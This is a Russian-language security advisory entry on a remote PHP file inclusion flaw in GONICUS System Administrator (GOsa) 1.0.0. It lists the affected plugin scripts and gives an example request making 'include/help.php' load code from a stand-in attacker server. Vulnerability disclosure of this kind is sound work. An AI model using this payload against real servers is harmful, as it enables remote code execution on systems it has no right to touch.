Дата публикации: | 28.02.2003 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 1055 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость обнаружена в GONICUS System Administrator (GOsa). Удаленный пользователь может внедрить и выполнить произвольный PHP код на системе, включая команды операционной системы. Несколько сценариев в программе позволяют удаленному пользователю изменять переменные, чтобы выполнить произвольный код. Удаленный пользователь может установить переменную 'plugin' в следующих файлах, указывающую на удаленно расположенный PHP файл, который будет выполнен на целевом сервере: plugins/3fax/1blocklists/index.php plugins/2administration/6departamentadmin/index.php plugins/2administration/5terminals/index.php plugins/2administration/ 4mailinglists/index.php plugins/2administration/3departaments/index.php plugins/2administration/2groupd/index.phpПодобная уязвимость существует в 'base' переменной в 'include/help.php' сценарии. Пример: http://target.server/include/help.php?base=http://attackers.server/Уязвимость обнаружена в GONICUS 1.0.0 |
Ссылки: | GOnicus System Administrator php injection |